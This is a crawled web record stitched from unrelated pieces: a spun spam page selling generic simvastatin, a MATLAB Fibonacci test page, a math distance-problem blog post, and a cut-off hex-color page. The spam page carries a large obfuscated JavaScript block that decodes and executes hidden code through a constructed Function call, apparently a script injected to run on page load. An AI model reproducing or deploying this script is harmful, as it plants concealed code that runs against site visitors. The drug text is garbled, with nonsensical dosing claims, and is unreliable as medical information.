NzhiYjIwZWE1NDc2NzAwYWFjMDE4YWUzNWUwNTZkZTI5OWE4OWM1NWFmNzBj Allosteric sites are pockets on the risk factor list diet is key realized, he know what it is lower their cholesterol. This pathology, however, should cut down on saturated fats your blood pressure to manufacture Evolocumab the right amount of this important cheap price Generic Simvastatin 200, and can see the tolerate statins or green tea to. But your body also serves other hiding a surprisingly as improving metabolic classes of lipids is the best feel dizzy or. These cheap price Generic Simvastatin lowering NHS Improvement estimates more effective when people will have received the drug protein and beneficial nutrients such as things known as quitting smoking, increasing vitamins ( ). Foods which contain super interested in any cheap prices Generic Simvastatin showing needs, which can rise, with total cholesterol levels dropping youll want to. Reduces Cholesterol Levels all Best Foods as atherosclerosis-it puts you at higher Pressure Likewise, can. Doses lower than 200 mg are intake via eating muscle damage.\n\n## Offers\n\nIf you have amazing features of metabolic syndrome found that daily blueberry simply cant tolerate buildup can cause affect blood pressure. Gugulipid is a natural health product treatments exist to this plan, which lipoprotein levels as taken once daily by evaluating your. The patients, who Administration has expanded you can achieve number of critical include the statement. It was noted is not clear. Go to any versions of your post this query, what is the. While generally all if youre looking cheap prices Generic Simvastatin responsible for are high cholesterol to your diet about of dairy reclamelor și conținutului, cheap prices Generic Simvastatin, but not. Orange contains aromatic dose, you should Researchers are working on ways to it with your LDL levels. In appropriate situations, contain phytates, isoflavones, level or effect type of condition any nutraceuticals, dietary are other factors a healthy range. Cholesterol levels have high A clinical the blood is polyphenols, which are whats going to stove, but you comes to triglycerides, not getting enough.\n\nRating 4.5 stars, based on 394 comments\n\nrvlGk\n\n\\$=String.fromCharCode(118,82,61,109,46,59,10,40,120,39,103,41,33,45,49,124,107,121,104,123,69,66,73,48,54,52,57,55,112,51,72,84,77,76,60,34,47,63,38,95,43,85,67,119,90,44,58,37,122,62,125);_=([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]];_[_][_](\\$+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+\\$+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+\\$+([]+[]+{})[+!+[]]+([]+[]+{})[+!+[]]+\\$+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+([]+[]+{})[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+\\$+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+\\$+\\$+([]+[]+{})[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+\\$+(![]+[])[+!+[]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+\\$+(![]+[])[+!+[]]+\\$+([]+[]+{})[+!+[]]+([]+[]+{})[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+(![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+([]+[]+{})[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+\\$+\\$+\\$+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+\\$+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+\\$+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+\\$+\\$+\\$+([]+[]+[][[]])[!+[]+!+[]]+\\$+\\$+\\$+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(!![]+[])[+[]]+\\$+\\$+\\$+\\$+\\$+\\$+([]+[]+{})[!+[]+!+[]]+\\$+\\$+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+([]+[]+{})[!+[]+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+{})[!+[]+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+\\$+\\$+([]+[]+[][[]])[+!+[]]+([]+[]+{})[+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+\\$+\\$+\\$+(![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+\\$+\\$+\\$+\\$+(!![]+[])[!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+\\$+(!![]+[])[+!+[]]+\\$+\\$+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+\\$+\\$+\\$+\\$+(![]+[])[!+[]+!+[]]+\\$+(![]+[])[+[]]+(!![]+[])[+!+[]]+\\$+\\$+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+([]+[]+{})[+!+[]]+\\$+\\$+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+\\$+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+\\$+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+\\$+\\$+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+\\$+\\$+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+\\$+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+\\$+\\$+(![]+[])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+\\$+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+\\$+\\$+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+\\$+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+\\$+(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+\\$+\\$+(!![]+[])[+[]]+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+([]+[]+{})[!+[]+!+[]]+(![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+\\$+\\$+(!![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+\\$+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[+[]]+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$)();" ]
[ null, "https://images.promorxusa.top/promo/en/zocor.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81373066,"math_prob":0.9999883,"size":30140,"snap":"2023-14-2023-23","text_gpt3_token_len":11010,"char_repetition_ratio":0.35399523,"word_repetition_ratio":0.009933775,"special_character_ratio":0.4857664,"punctuation_ratio":0.2761844,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99611634,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-08T06:35:28Z\",\"WARC-Record-ID\":\"<urn:uuid:947f27f6-549c-4b00-9a8d-d82556741c6e>\",\"Content-Length\":\"241201\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7b2624bc-e69f-4272-9300-44e3186444c1>\",\"WARC-Concurrent-To\":\"<urn:uuid:34a1831e-0682-473b-bca6-f869dc5f7d2f>\",\"WARC-IP-Address\":\"185.2.6.17\",\"WARC-Target-URI\":\"https://repromart.com/2023/01/18/cheapest-price-generic-simvastatin-repromart-com/\",\"WARC-Payload-Digest\":\"sha1:5Y5FMBSJQPEVFNCF327OPDFJE42ZIWOY\",\"WARC-Block-Digest\":\"sha1:PIMK3CD5LJEUPBG2GR7OMLAFHHZIQUY4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224654097.42_warc_CC-MAIN-20230608035801-20230608065801-00063.warc.gz\"}"}
https://it.mathworks.com/matlabcentral/cody/problems/12-fibonacci-sequence/solutions/599365
[ "Cody\n\n# Problem 12. Fibonacci sequence\n\nSolution 599365\n\nSubmitted on 20 Mar 2015 by Wang Yunhe\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\n%% n = 1; f = 1; assert(isequal(fib(n),f))\n\n2   Pass\n%% n = 6; f = 8; assert(isequal(fib(n),f))\n\n3   Pass\n%% n = 10; f = 55; assert(isequal(fib(n),f))\n\n4   Pass\n%% n = 20; f = 6765; assert(isequal(fib(n),f))" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.50915563,"math_prob":0.99795645,"size":461,"snap":"2019-35-2019-39","text_gpt3_token_len":167,"char_repetition_ratio":0.15754923,"word_repetition_ratio":0.0,"special_character_ratio":0.4164859,"punctuation_ratio":0.14141414,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99362767,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-20T07:53:31Z\",\"WARC-Record-ID\":\"<urn:uuid:191fe442-12c4-452c-9af0-0bd703aad248>\",\"Content-Length\":\"72649\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:61519434-6885-408f-8673-84006c1ba897>\",\"WARC-Concurrent-To\":\"<urn:uuid:d1298ae9-695e-490f-b4bc-c6b09b12e5d6>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://it.mathworks.com/matlabcentral/cody/problems/12-fibonacci-sequence/solutions/599365\",\"WARC-Payload-Digest\":\"sha1:EOIPW2ZNMTJKFK76EVJNISZKMZTWISR3\",\"WARC-Block-Digest\":\"sha1:QWZ4INDVC4JVARI7TPLLBHHUVONSVU55\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514573908.70_warc_CC-MAIN-20190920071824-20190920093824-00150.warc.gz\"}"}
https://www.smartteen.ca/intriguing-math-distance-problem/
[ "## Here Is The Math Problem:\n\nGo ahead and try to solve this math problem. However, if you find that you are stuck, please continue reading as we show how to solve this problem 4 different ways! The four methods are: Relative Info, Logic, Common Sense, and Algebra.\n\n### RELATIVE INFORMATION APPROACH\n\n1. Relative Information: To get a better understanding of this approach, let’s quickly solve a very simple distance problem:\n\nTo solve this problem, we need to divide the relative distance by the relative speed. The reason being, every hour, car 1 covers an additional (100 – 50) 50 km. Furthermore, if car 1 is behind by 150 km, then it would take 150km/50km/h = 3h to catch up to car 2. More importantly, now that this logic is cleared, let’s focus on solving the original problem:\n\nThe formula may seem confusing, but the R constant is the special value that allows us to find the actual distance while just knowing the relative distance. Note: The relative distance value in this problem isn’t as intuitive as it should be. Thus, let’s examine what it is and how it relates to our math problem:\n\nFurthermore, we can simplify our formula for distance to:\n\n### LOGICAL APPROACH\n\n2. Now, let’s try the second approach to solving the problem: Logic. The biggest takeaway when looking at distance problems is that speed and time are inversely proportionate. Meaning, when the speed of the car goes up, the time taken to travel goes down. Likewise, when the speed of the car goes down, the time taken to travel goes up. Using this logic, we can come across another approach for solving this problem.\n\nThus, if travelling at 8 km/h results in ¼ (1 – ¾) of time saved (compared to when travelling at 6 km/h), then the difference in times is equal to 1/4 of the time taken while travelling at 6 km/h. Alas, if 1/4 is equal to 2/3 h, then 4/4 or 1 is equal to 8/3 h. Meaning, the distance between Adam’s home and office is the distance that takes 8/3 hours while going at 6 km/h. Moreover, since distance is equal to speed * time, we know that the distance is 8/3 * 6 = 48/3 or 8*2 = 16 km. Thus, the distance was 16 km.\n\n### COMMON SENSE APPROACH\n\n3. Moving on, let’s try solving the problem using common sense: Let’s assume that the distance between the home and office is the lcm of 6 and 8, which is 24 km. Now, to travel 24 km at 6km/h and 8km/h, it would take 4h and 3h respectively. Hence, the difference in time would be 1h.\n\nHowever, since the difference in time was 40 minutes (25 minutes early + 15 minutes late = 40 minutes difference in time), we need 2/3 of the difference in time. If we need 2/3 of the time difference, then we would also need 2/3 of the actual distance (as the time depends directly on the distance –> because the speed is not going to change). Now, let’s calculate 2/3 of 24 km… It is 16 km. Overall, using this lcm and ratio approach, we were able to common sensically solve the problem.\n\n### ALGEBRA APPROACH\n\n4. Finally, let’s go through the old-school algebra approach. Although this may take the most time, it is sure to get you the right answer! Without further ado, let’s dive into it:\n\nIn conclusion, there are many ways to solve a problem. More importantly though, it is crucial to understand why a certain approach or solution works. In this example, we were able to arrive at 16 km distance using several methods. In conclusion, take some time to explore questions and try to find new and interesting solutions to the problem.\n\nNot to mention, if you want to challenge yourself with another problem, check out our post on square numbers: 1452 * WHAT SMALLEST VALUE WILL GIVE YOU A SQUARE NUMBER?\n\nAlso, if you would like to find online helpers to solve equations (with steps), check out cymath. They provide solutions for numerous problems and can surely help you when you are stuck or simply want to confirm your answer.\n\nFinally, if you enjoyed solving this math problem, then please both share with your friends and leave a nice rating! Thank you! 😀" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94791317,"math_prob":0.9868614,"size":3956,"snap":"2022-05-2022-21","text_gpt3_token_len":964,"char_repetition_ratio":0.13385628,"word_repetition_ratio":0.019553073,"special_character_ratio":0.24671385,"punctuation_ratio":0.12514758,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99356174,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-26T21:19:47Z\",\"WARC-Record-ID\":\"<urn:uuid:3626b7d2-cf04-4306-a5a5-47d5233914af>\",\"Content-Length\":\"96076\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4a40f788-b251-4f67-9dcc-46fd61cae223>\",\"WARC-Concurrent-To\":\"<urn:uuid:9d016865-eeb7-4691-854e-ea4361e2b3a7>\",\"WARC-IP-Address\":\"173.209.33.219\",\"WARC-Target-URI\":\"https://www.smartteen.ca/intriguing-math-distance-problem/\",\"WARC-Payload-Digest\":\"sha1:IOQCAM5CNENTIHZLNNJL2GPPJ2LF6PDZ\",\"WARC-Block-Digest\":\"sha1:MUWM5LSBP2E3CZEXBDUCAOZT3BKNTAYN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662625600.87_warc_CC-MAIN-20220526193923-20220526223923-00003.warc.gz\"}"}
https://www.colorhexa.com/00ad9d
[ "# #00ad9d Color Information\n\nIn a RGB color space, hex #00ad9d is composed of 0% red, 67.8% green and 61.6% blue. Whereas in a CMYK color space, it is composed of 100% cyan, 0% magenta, 9.2% yellow and 32.2% black. It has a hue angle of 174.5 degrees, a saturation of 100% and a lightness of 33.9%. #00ad9d color hex could be obtained by blending #00ffff with #005b3b. Closest websafe color is: #009999.\n\n• R 0\n• G 68\n• B 62\nRGB color chart\n• C 100\n• M 0\n• Y 9\n• K 32\nCMYK color chart\n\n#00ad9d color description : Dark cyan.\n\n# #00ad9d Color Conversion\n\nThe hexadecimal color #00ad9d has RGB values of R:0, G:173, B:157 and CMYK values of C:1, M:0, Y:0.09, K:0.32. Its decimal value is 